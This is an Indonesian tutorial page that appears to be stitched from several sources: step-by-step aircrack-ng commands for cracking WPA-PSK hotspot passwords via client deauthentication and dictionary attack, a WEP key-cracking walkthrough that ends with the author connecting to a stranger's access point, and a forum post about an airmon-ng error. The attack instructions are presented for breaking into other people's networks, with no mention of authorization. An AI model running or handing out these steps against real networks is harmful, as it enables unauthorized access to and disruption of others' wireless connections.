TUTORIAL CRACKING PASSWORD HOTSPOT WPAPSK DENGAN LINUX
BACKTRACKKali ini, saya akan mencoba sedkit memberi penejelasan
bagaimana sih cara membobol password hotspot yang bertipe wpa-psk
dengan mudah. Cara ini bisa menggunakan linux backtrack 4 final
release atau linux apapun tertama asal sudah terinstall aplikasi
aircrack-ng. Tidak berlama-lama mari simak artikel berikut.
Pertama, siapkan CD Live Backtrack atau bisa make linux ubuntu
dengan menginstall aplikasi aircrack-ng. Ketik perintah di bawah
untuk menginstall aircrack-ng di linux ubuntu sudo apt-get install
aircrack-ng
Kedua, masuk ke dekstop dengan perintah ~# startx (untuk yang
pakai backtrack)
Ketiga, buka konsole (terminal) dan ketikkan perintah untuk
melihat interface device yang ada ifconfig -a
Keempat, ketikkan perintah di bawah untuk mengaktifkan interface
wlan0 ifconfig wlan0 up
Kelima, sekarang gunakan aplikasi airmon-ng untuk airmon-ng
membuat virtual interface mode monitor dengan mengetikkan perintah
di bawah. airmon-ng start wlan0
Keenam, monitorlah jaringan di sekitar kamu. Caranya ketiklah
perintah ini. airodump-ng mon0 catatan : mon0 adalah interface
virtual hasil dari airmon-ng tadi
Ketujuh, fokuskan monitoring jaringan hotspot yang ingin kita
bobol passwordnya. Ketik lagi perintah berikut. airodump-ng -w coba
channel 11 bssid 001122334455 mon0 keterangan: memonitoring khusus
jaringan yang memiliki bssid 00:11:22:33:44:55 pada channel 11 dan
hasil dari monitoring di tulis pada file yang bernama coba
Selanjutnya, gunakan serangan dengan cara disconnect salah satu
client untuk mendapatkan paket handshake yang dibutuhkan untuk
proses cracking aireplay-ng -0 1 -a 001122334455 -c oo1cbfa13fe3
mon0 keterangan: aireplay-ng digunakan untuk mendisconnect salah
satu client yaitu 00:1C:BF:A1:3F:E3 untuk mendapatkan paket
handshake yang dibutuhkan untuk proses cracking -0 : mode serangan
deAuthentication 1 : dilakukan sebanyak 1x deAuth
Terakhir, setelah mendapatkan paket handshake, selanjutnya
adalah proses cracking dengan menggunakan aircrack dan file
password dengan existensi .lst atau .txt dengan perintah
aircrack-ng coba*.cap -w /pentest/passwords/wordlists/listpass.txt
keterangan : listpass.txt adalah file password yang saya buat
sendiri dan terletak pada
/pentest/passwords/wordlists/listpass.txt
NB,,,, keberhasilan proses cracking tergantung ada tidaknya
password yang ada di list password dengan password yang sebenarnya.
Jika password yang digunakan pada jaringan tersebut ada di list
password maka proses cracking akan berhasil dan jika password list
yang kita miliki tidak mencatat password yang digunakan pada
jaringan tersebut kemungkinan keberhasilan proses cracking akan
gagal. Dan akhirnya, yang sedikit dari saya ini semoga membantu
buat pengetahuan. Selamat mencoba
WEP Crack dan Cracking Tutorial. Wired Equivalent Privacy atau
(WEP) adalah salah satu cara mengamankan Acces point anda dari
penggunaan yang tidak di inginkan detailnya tentang WEP silahkan
langsung ke paman wiki Awalanya pastikan dulu disuatu tempat ada
hotspot yang dari bentuknya bisa dipastikan Linksys WRT54G or
Linksys WAP54G, nah ini yang Acces Pointnnya dilindung WEP password
64/128 bit HEX.. Langkah 1, Install Aircrack-ng #sudo apt-get
install aircrack-ng Langkah 2, Indentifikasi Device Kita cari tau
dulu MAC address device usb kita dan lokasi device tersebut,..
#sudo iwconfig, kemudian #sudo ifconfig oke dengan kedua perintah
diatas kita sudah dapat mengetahui kalo lokasi device wireless kita
berada di eth2 dengan mac 00:02:72:5A:3B:6C kita lanjut ke langkah
selanjutnya. Langkah 3, Scanning Scanning semua Access Point
sasaran untuk mengetahui 3 hal, ssid , mac 00:18:F8:36:83:23
channel 6 tempat acces point beroprasi, #sudo airmon-ng stop eth2
#sudo iwlist eth2 scanning Langkah 4, Monitor Mode lanjutkan dengan
merubah wifi kita menjadi monitor mode,.. #sudo airmon-ng start
eth2 6 Langkah 5, Capturing Package Kerjaan selanjutnya menangkap
paket yang keluar dari acces point disimpan sebagai file,.. #sudo
airodump-ng -c 6 bssid 00:18:F8:36:83:23 -w output eth2 nah kerjaan
ini yang agak lama, tergantung sekali dengan paket yang di
broadcast,.. kalo banyak yang pake Access Point itu makin cepet
kita bisa crack passwordnya,.. kira2 data yang harus kita kumpulkan
untuk cukup meng-carck 128 bit encryptions yah sekita 80.000 IVs,
kalo mau tau berapa IVs yang sudah kita punya,.. teken CTRL-C aja
truz lanjutkan ke langkah selanjutnya, Langkah 6, Crack #sudo
aircrack-ng -z -b 00:18:F8:36:83:23 output*.cap misal yang kita
dapat sekitar 81313 IVs,.. dan kita sudah dapat menemukan key atau
passwordnya,.. perlu di ingat jika IVs-nya masih belum mencukupi
pada saat anda melakukan perintah #aircrack-ng maka anda harus
mengulang langkah ke 5 begitu saja berulang-ulang sampai IVs-nya
terpenuhi diatas 80.000 IVs,
jika anda sudah mendapatkan passwordnya tinggal menggunakannya
untuk connect atau associates ,.. nah kebetulan pada saat saya coba
key-nya,.. ternyata terkoneksi dengan muluz, dan langsung dapet
IP,.. ternyata Acces Point Hot Spot tersebut memberikan IP otomatis
atau DHCP,.. akhirnya bisa konek dech,.. keliatan tuh.. cepet lagi
konek ke yahoo 200-san kerenkan, lain lagi ceritannya nanti kalo
ternyata IP-nya nggak Otomatis alias DHCP,.. ada lagi caranya
supaya kita bisa tetep terkoneksi,.. tapi nanti dech di tutorial
selanjutnya,.. selamet mencoba..!!!
User
Posts: 2 Thanks Given: 1 Thanks Received: 0 in 0 posts Joined:
Jun 2012 Reputation: 0 Post: #1 aircrack-ng error selamat siang
para kawan .. saya mau nanya nee masalah airrack pas ngikutin
tutorial yang ada di google.....
root@root:~# airmon-ng start wlan0
Found 3 processes that could cause trouble. If airodump-ng,
aireplay-ng or airtun-ng stops working after a short period of
time, you may want to kill (some of) them! PID Name 2547
NetworkManager 2565 wpa_supplicant 3673 dhcpcd
Interface Chipset Driver mon1 Unknown rt2800pci - [phy0] mon0
Unknown rt2800pci - [phy0] wlan0 Unknown rt2800pci -
[phy0]SIOCSIFFLAGS: Input/output error (monitor mode enabled on
mon4) mon3 Unknown rt2800pci - [phy0]
mon2 Unknown rt2800pci - [phy0] root@root:~# airodump-ng mon0
ioctl(SIOCSIFFLAGS) failed: Input/output error